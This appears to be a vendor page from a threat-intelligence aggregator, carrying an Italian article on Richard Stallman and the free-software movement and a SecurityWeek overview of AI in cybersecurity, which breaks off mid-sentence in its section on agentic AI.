Search/wikipedia
Vendor

wikipedia

Known CVEs
0
Highest CVSS
In KEV
0
Vendor
wikipedia toolbar
Connections
27 relationships
RMS: l’Eretico del codice. L’uomo della rivoluzione partita da una stampante rotta
Barba rabbinica, tonaca e sandali: nel 2000 si autodefinì “sull’orlo dell’autismo”. Storia di Richard Stallman, l’uomo del software libero e di una rivoluzione digitale che nessuno aveva previsto. Sono diverse le figure della comunità scientifica che hanno contribuito in maniera fondamentale a traghettare la nostra civiltà dal vecchio mondo analogico all’attuale società dell’informazione (digitale). Tra queste personalità quella che occupa sicuramente un posto di rilievo nell’pantheon informatico è sicuramente Richard Stallman. Richard Stallman è un programmatore statunitense, oggi settantatreenne. Nasce e cresce a New York e ha fatto parte del celebre laboratorio di intelligenza artificiale del MIT nel Massachusetts fino al gennaio del 1984. È proprio nel perimetro di questo laboratorio che si verifica l’evento destinato a dare una svolta al corso dell’informatica. La Xerox aveva donato all’AI Lab (laboratorio di intelligenza artificiale ) del MIT una stampante laser professionale di nuova generazione ma per una strana eterogenesi dei fini questa macchina si inceppava di continuo. Stallman conosceva il problema, sapeva come risolverlo avendo negli anni precedenti risolto problemi simili su altri dispositivi di stampa ma non aveva accesso al codice perché la Xerox distribuiva solo gli eseguibili, quindi, niente reverse engineering. Una buona occasione gli si presentò quando seppe di un ricercatore che aveva lasciato la Xerox PARC per trasferirsi alla Carnegie Mellon University portando con sé il codice. Si reca quindi di persona per chiedergli del sorgente ma tutto si riduce in una breve e brutale conversazione: l’ex ricercatore aveva firmato un accordo di riservatezza con l’azienda e dunque rifiutò di concedergli il codice e qualunque altra cosa. Tempo dopo lo stesso Stallman dichiarerà: “ Era la prima volta che m’imbattevo in una clausola di non divulgazione, e mi resi immediatamente conto come questi accordi producano delle vittime. In questo caso la vittima ero io .” Stallman arrabbiato, andò via senz’aggiungere una parola. Un incontro, durato forse 30 secondi, divenne il punto di svolta della sua vita. Da quel giorno dichiarerà: ogni volta che colleghi del MIT mi offrivano lavoro in aziende che richiedevano un contratto di riservatezza, mi rifiutavo. Questo isolamento progressivo lo portò a definirsi, riprendendo Steven Levy “ l’ultimo vero hacker ”. Questo è quanto basta per convincere il giovane Stallman che il codice proprietario non deve essere l’unica strada percorribile, anzi deve esserci un’alternativa valida e condivisibile ma per questo deve costruirla da zero. Ma per capire meglio la portata di questa scelta bisogna fare un ulteriore passo indietro. Agli inizi degli anni Settanta nei Bell Labs, Ken Thompson e Dennis Ritchie stavano riscrivendo il codice di Unix donando al mondo un nuovo linguaggio di programmazione, il Linguaggio C. Questo rendeva Unix (riscritto in C) oltreché portabile su altre macchine, anche di più facile manutenzione, scelta che successivamente avrebbe permesso al progetto GNU , e più tardi a Linux, di poggiare su basi solide ma, in particolare, era la situazione accademica di quegli anni a renderlo un periodo particolare: Il clima accademico aperto, quello che Stallman vive al MIT, permetteva a ricercatori e università di scrivere e scambiarsi liberamente idee e software creato. Ma con il passare del tempo, questo clima andò via via ridimensionandosi e anche Unix avrebbe perso parte della sua apertura, diventando sempre più chiuso: codice a pagamento, licenze restrittive. Quella di Stallman fu quindi una reazione a queste increspature industriali e ad un contesto che andava cristallizzandosi verso sempre una maggiore chiusura. Così nel gennaio del 1984 anziché schierarsi dalla parte di chi si batteva per il copyright per il software come aveva fatto Bill Gates pochi anni prima scrivendo la celebre: “ Lettera aperta agli hobbisti “, Stallman si decise a compiere un gesto retrospettivamente rivoluzionario, lasciò il laboratorio del MIT per fondare un progetto nuovo, tutto suo. Nasce così il progetto GNU , dal quale nasceranno poi la Free Software Foundation e la licenza GPL . Richard Matthew Stallman Richard viene al mondo a New York nel 1953, figlio di Daniel Stallman e Alice Lippman. Il padre è un veterano della Seconda Guerra Mondiale che ha partecipato allo sbarco in Normandia: un uomo integro, ricorderà il figlio, ma anaffettivo. La madre insegna arte ed è un’attivista sindacale. Vivace e politicamente impegnata di orientamento progressista, l’esatto opposto del giovane Richard, all’epoca adolescente dalle idee conservatrici. Le loro opposte idee li porteranno spesso a quotidiani e furiosi scontri. I genitori divorzieranno nel 1958, quando Richard ha solo cinque anni. Inizia così per il futuro informatico un periodo di pendolarismo tra l’appartamento della madre a Manhattan e la casa del padre nel Queens. Anni di incomprensioni che Stallman ricorderà sempre con tristezza. Richard Matthew Stallman Un introverso enfant prodige Fin dall’infanzia si distingue per comportamenti inusuali: la madre, Alice Lippman, racconta due episodi in particolare. Da bambino, portato in spiaggia, iniziava a urlare ben prima di arrivare alla battigia, infastidito dal rumore della risacca; e piangeva ogni volta che la nonna, dai capelli rosso vivo, tentava di prenderlo in braccio, quasi infastidito dal colore stesso. Episodi che la madre, anni dopo, ricollegherà a certe caratteristiche dello spettro autistico. Sviluppa presto un proprio metodo per orientarsi nel mondo: a 7 anni memorizza le mappe della metropolitana di New York stando al finestrino del primo vagone, e lancia modellini di razzi a Riverside Drive Park annotando i risultati di ogni lancio. Fu proprio in un periodo di lutto, a dieci anni, dopo la morte dei nonni paterni, che un istruttore di un corso estivo gli procurò un manuale dell’IBM 7094: Richard iniziò a scrivere programmi su carta, senza ancora avere una macchina su cui farli girare. Comportamenti che lo stesso Stallman stigmatizzerà in un’intervista al Toronto Star del 9 ottobre 2000 (firma di Judy Steed), nella quale si autodefinì: “Sull’orlo dell’autismo” Gli studi Altro comportamento che lo contraddistingueva dai suoi coetanei a scuola era la sua avversione per i compiti scritti che per anni aveva boicottato e sistematicamente eluso. Il suo ultimo tema risaliva alla quarta elementare. Mentre frequentava la Louis D. Brandeis High School, scuola presso cui si sarebbe diplomato, Richard frequentava il Columbia Science Honors Program, un corso riservato ai migliori studenti delle medie di New York e lavorava come assistente di laboratorio alla Rockefeller University, dove il direttore rimase talmente colpito dal suo talento da telefonare alla madre anni dopo per sapere come stesse, convinto che avrebbe avuto un grande futuro in biologia. Il suo primo vero programma lo scrisse in estate all’IBM New York Scientific Center: un preprocessore per il 7094 in linguaggio PL/I, poi riscritto interamente in assembler perché troppo grande per quella macchina. Andava ancora alle medie. Mentre è ancora all’università che ha inizio la sua leggenda grazie anche alla capacità di correggere i suoi professori mentre facevano lezione, cosa che gli attirò molte antipatie, nel 1974 ad Harvard consegue la laurea in fisica. Dopo la laurea, entra a far parte del laboratorio di intelligenza artificiale del MIT (AI Lab), dove aveva già iniziato a lavorare nel 1971. In quel contesto la parola “ hacker ” non ha una valenza negativa, anzi, si riferiva a chi studiava e s’impegnava senza sosta per migliorare software e sistemi. Scrivere codice era solo un punto di partenza. La filosofia dell’AI Lab era semplice: dare e ricevere, tutto era improntato sulla condivisione e sul miglioramento del codice e chiunque poteva usarlo e migliorarlo restituendolo alla comunità scientifica con nuove aggiunte. Il laboratorio, nei suoi anni d’oro, era per Stallman qualcosa di simile a una città viva: alcune sezioni si rinnovavano continuamente, altre restavano immutate al punto che si poteva riconoscere, dalla scrittura del codice, il lavoro dei programmatori degli anni Sessanta. Poi, nei primi anni Ottanta, quella città cominciò a svuotarsi. La Symbolics, una startup nata da una costola dello stesso MIT, si portò via i migliori programmatori a uno a uno, e tutti firmarono accordi di non divulgazione con l’azienda. Stallman restò Solo. Richard Matthew Stallman Il rivoluzionario Ateo Nonostante fosse figlio di madre ebrea, si dichiarava non credente. Ma era molto provocatorio anche nel professare il suo ateismo. Leggenda vuole che girasse con una spilla su cui era scritto “Processiamo Dio”. La logica era la seguente: se una divinità così potente avesse creato il mondo senza mai correggerne i problemi, avrebbe ragionato, forse più che adorarla, sarebbe stato il caso di processarla. Questa stessa provocazione negli anni prese forma di un piccolo monologo che recita ancora oggi, impersonando l’imputato. La goccia che fa traboccare il vaso Alcuni anni dopo l’evento della stampante laser, gli hacker del MIT sotto la guida di Richard Greenblatt avevano modificato e perfezionato la Lisp Machine, un computer dell’AI Labs creato da John McCarthy negli anni Cinquanta per il linguaggio Lisp. Agli inizi degli anni 80 questo progetto si divise in due rami diversi ognuno rappresentato da una diversa azienda. La Symbolics rappresentata da Russell Noftsker, ex amministratore del laboratorio, e la Lisp Machine Inc di Greenblatt. Le due aziende si contesero il personale dell’AI Lab: alcuni furono assunti come consulenti dalla Symbolics, il resto degli esperti (hacker) andò alla Lisp Machine Inc. L’unico degli esperti che decise di rimanere all’AI Lab fu Stallman che rimase a guardia della Lisp Machine dell’AI Lab. Nel giorno del suo ventinovesimo compleanno la Symbolics ritira il suo accordo informale stipulato con il Laboratorio del MIT. L’accordo consisteva nel condividere le innovazioni e i miglioramenti del codice sviluppati dall’azienda per aggiornare il sistema operativo comune delle Lisp machine. Da quel giorno in poi se il MIT avesse voluto gli aggiornamenti avrebbe dovuto comprare macchine dalla Symbolics e interrompere ogni rapporto con la concorrenza. Stallman da hacker e genio qual’era reagì male all’ultimatum: descrisse il laboratorio come “ un paese neutrale, come il Belgio ” di fronte a un’invasione se la Germania attacca il Belgio, spiegò, il Belgio si schiera con Francia e Inghilterra. Un paragone che Stallman avrebbe ripetuto, quasi identico, anche in un’altra intervista rilasciata anni dopo al giornalista Michael Gross, segno di quanto quell’immagine gli fosse rimasta impressa. Inizio della leggenda Quel che accade dal 1982 entra a ragione nel leggendario, ogni volta che la Symbolics rilasciava una nuova funzione, un aggiornamento, Stallman lo riscriveva da zero per tenere sempre aggiornata la Lisp Machine del MIT e lo stesso laboratorio al passo coi tempi. Iniziò a sfidare, come si dice, a singolar tenzone, a colpi di tastiera e di codice i suoi migliori ex colleghi di laboratorio, passati alla concorrenza. Fu anche accusato di copiare il codice, ma per smentire le accuse smise anche di leggere il loro codice ricostruendo tutto da zero partendo solo dalla documentazione. Nonostante la tenacia e la preparazione, Stallman sapeva di non poter combattere all’infinito contro un’azienda e la maggior parte dei suoi ex colleghi, che lo ritenevano un romantico hacker anacronistico, passati tutti dal software di laboratorio al software di mercato. Si era convinto che non poteva essere più l’ultimo giapponese rimasto nella foresta a combattere a guerra finita, non aveva più senso.L’AI Lab era come una cucine di certi ristoranti storici: un po’ malandata, un po’ geniale, e impossibile da replicare altrove . Bisognava costruire qualcosa di nuovo e che nessuna azienda potesse ricomprare. GNU non è Unix Gennaio 1984. Per evitare che il MIT metta le mani sul suo codice e lo chiuda in un cassetto proprietario, Stallman taglia i ponti. Lascia l’università e lancia un’idea che ai molti suona semplicemente folle: scrivere un intero sistema operativo da zero, che sia compatibile con UNIX . Il nome scelto è tutto un programma: GNU (acronimo ricorsivo per GNU’s Not Unix ). Le regole d’ingaggio? Nessun segreto. Il codice deve rimanere aperto, studiabile e modificabile. Sempre. C’era però un ostacolo di fondo. Per far girare un sistema Unix-like serve un compilatore C, e all’epoca di roba libera non c’era neanche l’ombra. Che fare? Semplice: scriversene uno. Nasce così la Free Software Foundation (FSF) per raccogliere donazioni, e nel 1987 spunta fuori la primissima versione di GCC . Un punto di non ritorno. Era il primo compilatore C portabile e ottimizzato nato completamente libero. Insieme all’editor Emacs e alle utility di base, GCC diventa il pilastro della futura informatica. E da allora non si è mai più fermato: ha inglobato il C++, ha visto nascere un ramo sperimentale pazzesco (EGCS) che ha riscritto le regole dell’ottimizzazione, fino a supportare Fortran, Java e Ada. Oggi la chiamano GNU Compiler Collection , ed è gestita da un comitato misto di accademici e industriali. Il Kernel E il kernel? Mettiamola così: nei piani originali doveva chiamarsi Alix (il nome della ragazza di Stallman all’epoca). Poi lo sviluppatore principale, Michael Bushnell, ci mise lo zampino e optò per HURD , declassando Alix a un semplice sottosistema interno. Poco dopo la coppia scoppiò, e di Alix rimase solo un vecchio appunto nei file di progetto. Curiosità logistica: prima di Internet, come si distribuiva questa mole di codice? Via posta. Man mano che i programmi diventavano stabili, Stallman masterizzava i nastri magnetici e li spediva a casa di chi li chiedeva, dietro un piccolo rimborso spese. In pratica, aveva appena inventato la prima attività di distribuzione software della storia senza nemmeno rendersene conto. Copyleft Nel 1989 Stallman formalizza la GNU General Public License sul principio del Copyleft. Scrivendo il suo codice software come codice legale. Crea un nuovo tecnicismo giuridico fondato sul capovolgimento del funzionamento del Copyright. Il Copyleft non è usato per limitare, restringere la libertà degli utenti, anzi serve a garantirla. Chiunque sia in possesso di un software sotto licenza GPL può liberamente copiarlo, modificarlo, ridistribuirlo senza nessuna restrizione ma con un unico obbligo: qualsiasi versione derivata deve restare sotto il dominio GPL, in modo da godere delle stesse libertà delle versioni precedenti. Richard Matthew Stallman L’ambiguità Il progetto GNU nasce per promuovere la libertà e la cooperazione tra gli utenti di computer e tra i programmatori. Software libero non significa software gratuito. Con la parola Free il software va pensato come se si pensasse alla “Libertà di parola” e non a una “birra Gratis” ripete da sempre Stallman. Dunque, ci si riferisce alla libertà di chi usa quel programma. Nel manifesto del software libero (GNU), sono elencate 4 libertà Libertà 0 : Eseguire il programma per qualsiasi scopo. (Puoi usarlo come vuoi) Libertà 1 : Studiare come funziona il programma e adattarlo alle proprie necessità. (entrare nel codice e modificarlo) Libertà 2 : Ridistribuire copie per aiutare il prossimo. (Fare copie e passarle agli altri) Libertà 3 : Migliorare il programma e distribuire i miglioramenti a beneficio della comunità. (Modificare il codice e passarlo agli altri) Un software può essere distribuito gratuitamente ma non rispettare nessuna delle 4 libertà, come succede in molti casi di software proprietario distribuito senza costi. Al contrario del software libero che anche se venduto commercialmente chi lo acquista è obbligato a mantenere intatte queste 4 libertà. Sant’IGNUcius il suo Alter Ego giocoso Da anni Richard Stallman presenta conferenze dove divulga il verbo del software libero. E in particolare modo chiunque usi il termine “ open source ” al posto di “free software” viene subito richiamato all’ordine. Leggenda narra che in una conferenza, mentre veniva presentato da un docente di una famosa università statunitense come esperto di open source, Stallman balzò in piedi precisando che lui si occupava di software libero e non di altri movimenti. Ma a queste conferenze non mancano ironia e momenti iconici. A un certo punto della serata tira fuori da una busta un vecchio disco magnetico e se lo mette in testa: la luce dei riflettori lo trasforma in un’aureola perfetta. Indossa poi una tonaca nera e si presenta al pubblico come “ San IGNUcius della Chiesa di Emacs ”, alzando la mano destra in un gesto di benedizione scherzosa: “Benedico il tuo computer, figlio mio”. Lo stesso Stallman racconta sul proprio sito di aver ideato il personaggio nel 1996, come modo per “prendersi gioco di sé stesso” senza prendersi troppo sul serio. Stallman è anche conosciuto per la sua avversione alla stupidità e alle cerimonie, è risaputo che se qualcuno fa qualcosa di stupido non esita a rinfacciarglielo. San IGNUcius della Chiesa di Emacs Il trionfo silenzioso Torniamo ai primi anni Novanta. Il sistema GNU ha quasi tutti i pezzi al loro posto, ma gli manca un cuore pulsante. Il kernel HURD è in ritardo cronico. A togliere le castagne dal fuoco ci pensa, nel 1991, un giovane studente finlandese: Linus Torvalds Sforna il kernel Linux e, nel 1992, decide di pubblicarlo sotto la licenza GPL di Stallman: da lì succede l’imprevedibile. L’unione degli attrezzi di GNU con il motore di Torvalds fa nascere il sistema GNU/Linux. Quello che era partito come un mix tra idealismo radicale e l’hobby di un universitario, oggi tiene letteralmente in piedi il mondo digitale. Non ci credete? Guardatevi attorno. I 500 supercomputer più potenti della Terra usano Linux. I server di Hollywood che renderizzano gli effetti speciali? Linux. Perfino l’elicotterino Ingenuity della NASA, che ha svolazzato su Marte, ha dentro un’anima Linux. E poi, ovviamente, c’è Android. Nel 2005 Google si compra l’omonima startup, infilando di fatto un derivato di Linux nelle tasche di oltre tre miliardi di esseri umani. Ed è qui che si consuma il cortocircuito finale, la firma del vero hacker. A fronte di questo trionfo planetario del suo software, oggi Stallman si rifiuta di toccare uno smartphone. Per lui non sono altro che dispositivi di sorveglianza di massa da portare a passeggio, macchine pensate per tracciare la gente tramite software chiuso. E nel 2026? A gennaio 2026 Stallman era ad Atlanta, al Georgia Institute of Technology . Cinquanta minuti di conferenza, poi un’ora e mezza di domande. Stesso copione di sempre tranne il nemico, che stavolta ha un nome nuovo. L’intelligenza artificiale. O meglio: la “Pretend Intelligence”. Perché chiamarla “intelligente”, ragiona lui, è già cedere terreno. È comprare la réclame. È convincersi che queste macchine capiscano qualcosa mentre generano testo e basta, senza sapere cosa significa. Nel medesimo intervento ha allargato il tiro: auto connesse, backdoor nei processori, dispositivi che il produttore può spegnere da remoto con un aggiornamento. Roba che conosce bene. La logica è identica a quella della stampante Xerox: qualcuno, da qualche parte, tiene le chiavi di casa tua. Tu pensi di possedere qualcosa. Non è così. La differenza tra il 1982 e il 2026? La scala. E il fatto che adesso ci si casca in tre miliardi. Vintage C’è chi, come chi vi scrive, ricorda ancora l’odore dei laboratori informatici universitari: ventole che ronzavano a tutte le ore, e un prompt che aspettava paziente il comando gcc . Per intere generazioni di matricole, imparare il C non significava aprire un ambiente di sviluppo blasonato, ma aprire un editor spartano e invocare quel compilatore nato nel 1987 dalle mani e dalla testardaggine di Richard Stallman: il primo compilatore ANSI C ottimizzante e portabile distribuito come software libero, capace persino di ricompilare sé stesso. Il C, si diceva nei corsi, dava accesso diretto alla memoria della macchina. Un privilegio che si pagava a caro prezzo, come in uno dei tanti casi capitati al chi scrive e ai suoi colleghi di corso che, a ricevimento dal professore, si scontravano con il prodotto tra una matrice e un vettore a colpi di segmentation fault e di notti passate a inseguire un puntatore impazzito con gdb . Ma proprio in quella fragilità, in quel dover capire davvero cosa succedesse sotto il cofano, si nascondeva il fascino: GCC non nascondeva nulla, e nemmeno pretendeva di farlo. Era la prova tangibile che un’idea nata nel 1984 dal progetto GNU la libertà di usare, studiare, modificare e condividere il software potesse reggere il confronto, e spesso vincerlo, con i compilatori commerciali del tempo. Ogni errore di compilazione portava con sé quella strana familiarità con una macchina che sembrava, in fondo, condividere gli stessi principi di chi l’aveva creata. Anni dopo, Richard Stallman fu ospite d’onore in un congresso organizzato a Napoli dall’Università Federico II: un evento al quale il sottoscritto non ebbe il tempo di partecipare. Con grande, grandissimo rammarico. Fonti Sam Williams e Richard M. Stallman, Free as in Freedom 2.0: Richard Stallman and the Free Software Revolution (Free Software Foundation, 2010), distribuito sotto licenza GNU Free Documentation License. Capitolo 3: oreilly.com/openbook/freedom/ch03.html — Capitolo 7: oreilly.com/openbook/freedom/ch07.html Michael Gross, “Richard Stallman: High School Misfit, Symbol of Free Software, MacArthur-Certified Genius”: mgross.com/books/my-generation/my-generation-bonus-chapters/richard-stallman-high-school-misfit-symbol-of-free-software-macarthur-certified-genius/ Richard Stallman, “Saint IGNUcius”, pagina ufficiale dell’autore: stallman.org/saint.html — foto e video, categoria “Saint IGNUcius” su Wikimedia Commons (licenze CC-BY / CC-BY-SA): commons.wikimedia.org/wiki/Category:Saint_IGNUcius Judy Steed, Toronto Star, sezione Business, 9 ottobre 2000, p. C03 (per la citazione ‘sull’orlo dell’autismo’).” manca la precisazione concordata: “Articolo cartaceo, non disponibile in archivio digitale libero. Riferimento bibliografico verificato in: Sam Williams, Free as in Freedom, cap. 3, nota 3. Wikipedia, voce “Richard Stallman” (riferimento pubblico aggiuntivo per il dettaglio del manuale IBM 7094): en.wikipedia.org/wiki/Richard_Stallman Copertura giornalistica indipendente del discorso di Stallman al Georgia Institute of Technology, 23 gennaio 2026, tra cui Slashdot, Hardware Upgrade e Rivista AI. L'articolo RMS: l’Eretico del codice. L’uomo della rivoluzione partita da una stampante rotta proviene da Red Hot Cyber .
redhotcyber.comAug 17, 2026extracted
AI and Cybersecurity – Everything You Wanted to Know, But Were Afraid to Ask
To better understand the current state of artificial intelligence (AI) in cybersecurity, SecurityWeek spoke with dozens of security practitioners, researchers, vendors, analysts, and AI experts. The result is a comprehensive snapshot of how AI is being used across the security landscape today. Organized into five key topic areas, this report examines the role of AI through multiple lenses: whether it can be trusted, how organizations are using it, how it can be misused by legitimate insiders, how it is being exploited by cyber adversaries, and where the technology is likely headed next. The five topics are: Generative AI (gen-AI) Agentic AI Shadow AI Machine learning (ML) Artificial general intelligence (AGI) Taken together, these perspectives provide a practical assessment of AI’s opportunities, risks, and likely evolution in cybersecurity. Generative AI Generative AI (gen-AI) is the bedrock of contemporary AI, although it is technically and potentially born out of earlier machine learning (ML, see below). It does what it says: it generates new content (most commonly text) from an AI model (most usually a large language model or LLM). Chatbots are the users’ interface to the LLM, enabling questions (known as prompts) to be applied and responses received in natural language, and answers to be received in natural language. Chatbots are the interface, and LLMs are the reasoning engine. For most people in most direct use the two seem inseparable – just one big gen-AI application. “Gen-AI trains on massive data sets, learns statistical and relationship patterns, and then uses those patterns to synthesize original output from a prompt,” explains Ahmad Shadid, co-founder and CEO at ORGN.com. This is important. It does not create factually correct answers to prompts; it predicts probable answers based on the relationship patterns it has learned – but it does create linguistically correct and compelling responses. Four deep learning architectures power the training for modern gen-AI variants. Transformer architecture (the ‘T’ in GPT and BERT) is used for the LLMs such as ChatGPT, BERT and Claude. Diffusion training generates the variants that focus on creating high quality images and also audio and video. Fundamentally, this process starts with random noise. Mathematically (guided by the user’s prompt) it reduces and reshapes the noise into the required clear result. Diffusion reverses the process of destruction. The generated result is again based on probability – in this case, the probably correct distribution of pixels. Classic diffusion is evolving into diffusion transformer technology (Sora) and ‘flow matching’ (DALL-E 3 and Midjourney) which can be described as next-gen diffusion. Generative adversarial networks (GANs) are trained via two adversarial networks locked in a feedback loop. One creates fake data, while the other learns to detect flaws by repeatedly suggesting flaws and feeding them back to the creation. Both improve until the detector can find no more flaws in the creation. This approach is good at creating images, video and audio, but has largely been superseded by diffusion technology for business use. However, criminals still use GAN-based simple, fast, real‑time face‑swap and voice‑clone models to create deepfakes. The fourth architecture, variational autoencoders (VAEs), use an encoder-decoder architecture for synthetic data generation, data compression, and anomaly detection. “Their main applications are in medical imaging and molecular generation for drug discovery,” comments Shadid. Trust in gen-AI “Gen-AI is a prediction engine. It generates what’s statistically plausible based on patterns it has seen before,” explains Emanuel Salmona, CEO and co-founder at Nagomi Security. “This makes it good at exploration: generating exploit hypotheses, trying different inputs, and connecting a strange behavior to known vulnerability patterns,” expands Albert Ziegler, head of AI at XBOW. “It’s a tool companies can use to automate creative labor,” adds David Karandish, CEO and founder at Capacity. And because of this, “It is becoming closely embedded into security teams’ workflows, from summarizing incident reports to helping draft response plans,” continues Devvret Rishi, general manager of AI at Rubrik. Galina Kho, chief strategy officer at Cyberbay, describes the advent of gen-AI as an efficiency revolution. “It’s not that entirely new capabilities have emerged; it’s that existing ones have become dramatically easier to execute at scale.” The biggest question in the use of AI is whether you can trust an output that is based on probability rather than grounded in known truth. The answer here is 56 shades of ‘No’. “It can be considered both trustworthy and not trustworthy, depending on the intent, the models used and the overall data flow involved,” comments Melissa Ruzzi, senior director of AI at AppOmni. “Gen-AI is not inherently trustworthy,” says Yichuan Zhang, CEO and co-founder of Boltzbit. “It is prone to hallucinations (confident but false statements) and data leakage (reproducing the training content or the context content exactly).” Trever Falconi, director of security and IT operations at HOPPR, explains, “Deploying a gen-AI model is not like installing software. A model trained at one institution will behave differently at another because it learned from a specific set of data and workflows. Move it somewhere new and you’ve introduced a distribution shift: the real-world data it now encounters no longer matches what it was built on, and performance quietly degrades.” Trustworthiness is a complicated question, suggests Aaron Sant-Miller, VP of AI at Booz Allen. “The model is making its best guess at the right response, but it’s not perfect.” Since gen-AI is the bedrock of all AI, there is a trickle-down effect of its strengths and weaknesses into both agentic AI and shadow AI discussed later. Cyber defenders should always be aware that gen-AI can produce errors; but that should not prevent its use. However, as Ruzzi stresses in quoting from Henri Thiel’s 1971 book (Principles of Econometrics), “Models are to be used, not believed. AI should assist analysts, not replace judgment.” The danger is that human nature drives people to believe anything that is said with confidence, and gen-AI can outright lie with confidence. Randell McNair, an adjunct professor at Florida Polytechnic university, explains on LinkedIn, “[Gen-AI] is for all practical purposes a ‘smart’ kid that has been told its whole life it is ‘brilliant’ when in fact, it is just a nearly-8 year old that has never experienced (felt the pain of) a single tangible consequence for being wrong, and has no memory of having ever truly failed someone and had to genuinely regret the shame and embarrassment that should be part of the ‘learning from failure’ process.” Gen-AI use Zhang suggests three areas where gen-AI use offers benefit: SOC productivity (summarizing complex incident logs and writing initial draft reports); secure coding (assisting developers with boilerplate code that adheres to security standards); and vibe coding (assisting non-developers with coding software applications from scratch). “Many enterprises use these models to generate documents, write articles, generate software, or replicate the messages a human would send when orchestrating a larger workflow,” says Sant-Miller. “It helps draft emails, summarize information and reduce manual effort,” adds Travis Springer, president at Sagiss. “Medical imaging teams are piloting vision-language models to surface findings from imaging studies,” says Falconi, “and researchers use synthetic data generation to fill gaps where real patient data is scarce or sensitive to use at scale.” New uses for gen-AI are continually being developed, but within cybersecurity, the most effective use comes from agentic-AI (see below) which can transform gen-AI from a passive responder into an active engager. Gen-AI misuse The misuse of gen-AI within enterprises is usually unintentional: it emanates from a failure of governance around the technology. Ungoverned use of gen-AI is always a misuse of AI. Individuals begin to rely on AI to provide quick (but not necessarily accurate) answers to questions or problems. If an AI model is deployed across the company without adequate control over its use, this can lead to a degradation of personal skill levels and an ungoverned increase in costs (the idea that AI is cheap is wrong). If access to a chatbot is not provided, employees will use external services with even less control (see shadow AI below). The problem comes from both individuals and management treating AI as a solution rather than an assistant. For example, there is potential to use AI’s coding capability to reduce the number of expensive qualified programmers. Anyone who can prompt an AI can now produce a program – but such programs will inevitably introduce new vulnerabilities. This problem goes away if qualified people use AI as an assistant, a tool to improve performance, rather than a means to reduce expensive headcount. Governance is the key to preventing the misuse of gen-AI. Gen-AI abuse By abuse, we mean bad actor use. In cybersecurity, bad actors always adopt new technology at a faster rate than legitimate business. This has certainly been true with AI. The primary reason is the power and complexity of AI. When an enterprise develops an internal AI application, it must be certain to get it right or face a possible self-inflicted catastrophe. This takes time. Criminals don’t have this concern. If something they implement doesn’t work perfectly, they just start again at no disruptive cost. The result is that new attacks tend to appear before adequate defense appears – the defenders may expect the attacks but have no detailed knowledge of them before they start. Zhang highlights three primary examples of gen-AI abuse: hyper-realistic phishing (eliminating the grammar/spelling ‘tells’ of traditional phishing); polymorphic malware (using gen-AI to subtly rewrite malware code to bypass signature-based detection); and vibe coded phishing websites and/or aggressive attacking software (using gen-AI to subtly rewrite apps that look like the original apps, but steal the user’s sensitive data). Gino Sciretta, CEO at BranditScan, warns, “Generating a convincing fake identity now takes seconds. Detecting one reliably still requires specialized tools and trained analysts. Most platforms and most users are not equipped for that. The technology has outpaced the safeguards, and the gap is widening, not closing.” Gen-Ai has introduced a step change in the quality of adversarial social engineering. It can be used to profile an individual by analyzing any social media footprint, and to then develop a targeted lure. It can build a compelling backstory to the attack, and prepare a false or disguised website to capture personal data. “Gen-AI makes mass targeted phishing, malware iteration and vulnerability research much more accessible to bad actors. Tools like WormGPT strip out the safety guardrails entirely, so attackers get the same speed advantages as regular GenAI but without the friction,” comments Harshit Agarwal, co-founder and CEO at Appknox. Image and voice cloning, and video generation is creating a deepfake scenario that increases a BEC and VEC threat that will only escalate in scale and sophistication. “Ninety-four per cent of AI-generated images had visual artifacts, but those artifacts were so subtle that the majority of targets never noticed them,” adds Sciretta. “The telltale signs are there if you know where to look, such as inconsistent light reflections in the eyes, where one pupil reflects a window and the other reflects something entirely different. But consumers are not trained to look for that, and the generators are improving faster than public awareness.” But he adds, “The most dangerous development is not the fake photos. It is the fake conversations. AI-driven chat systems can now sustain emotionally convincing dialogue over days or weeks, accelerating emotional manipulation roughly 300% faster than a human operator could.” As Ted Miracco, CEO at Approov, says, “The danger isn’t just what AI can do; it’s how fast it acts before anyone notices.” For now, criminals are primarily using AI to improve what they already do: more efficient social engineering, discovery of vulnerabilities in code, and generation of exploits. The next step will be automating the complete process of attack through agentic AI systems. Gen-AI future Amara’s law (Wikipedia) states, “We overestimate the impact of technology in the short run and underestimate the effect in the long run.” The difficulty with AI is that the short run could be next week, while the long run is probably just a few months. By the time most people really understand what is happening, what is happening has already changed. Nevertheless, some brave experts have held a finger to the wind and given their predictions. Ronan Murphy, chief data strategy officer at Forcepoint, believes, “Gen Al will be embedded in everything – every spreadsheet, every video, every workflow. The distinction between ‘using AI’ and simply ‘doing your job’ will essentially dissolve. For security teams, that means the surface you’re trying to protect keeps expanding, probably faster than your policy framework can keep up.” Zhang sees a future with SLMs (small rather than large language models). “We are moving toward ‘small language models’ that are hyper-specialized for specific domains (like a model trained exclusively on Linux kernel vulnerabilities) to reduce noise and increase accuracy.” Sant-Miller is more circumspect, wondering if the very nature of current AI makes its future indeterminable. “The future of gen-AI is a complicated one,” he says. “Models continue to get larger and, accordingly, more powerful. But there are two oppositional forces. Larger models are more expensive – both to train and to use – so capability comes at a cost. And models are trained off human generated content that provides a proxy on human reasoning. What then when most of the content is AI generated and no longer provides that proxy. These are the big questions we need to resolve as an industry.” Agentic AI Agentic AI is an evolutionary extension of chatbot gen-AI. Simplistically, a user asks the chatbot a question and then behaves in accordance with the answer received. With agentic AI, the gen-AI returns its answer to an agent, which can then instruct other organizational tools to fulfill the required behavior. But agentic AI is far more complex than this simple view – it is a task controller (or decision-maker) that uses an LLM as the primary cognitive source. The agent, or agents, are dynamic, stateful and adaptive, goal-driven and aware of the tools it or they can use to fulfill the goal. “Agentic AI converts LLMs that answer questions into software that automates the execution of work,” explains Eric Syphard, executive lead for AI at Booz Allen. “Think LLMs with hands.” Technical breakthroughs in long-memory context, tool use and evaluation enable agentic systems to complete complicated multi-step processes with little to no human oversight. “This isn’t just a new version of AI,” he continues, “It’s an entirely new operating and economic model for delivering labor: ‘labor as software’.” Miracco adds, “Agentic AI doesn’t just answer questions, it can also act autonomously on your behalf. By calling APIs, running code, managing workflows, making decisions, the LLM is now the brain controlling anything it has been granted access to, such as your phone.” Agentic AI is a meaningful step beyond gen-AI. “Rather than responding to a single prompt, an agent reasons, plans and acts. This often happens across multiple tools, data sources and application integrations, with minimal human involvement at each step,” explains Murphy. “You give the agent a goal, not an instruction, and it figures out how to get there.” Trust in agentic AI Since agentic AI uses gen-AI for cognition, it inherits the gen-AI trust issues, but with greater danger from direct access to company assets coupled with the potential for autonomous action on those assets. Can it be trusted? “It depends entirely on how it’s built. An autonomous agent with unrestricted access to your systems is a liability (see OpenClaw). An autonomous agent with scoped permissions, human 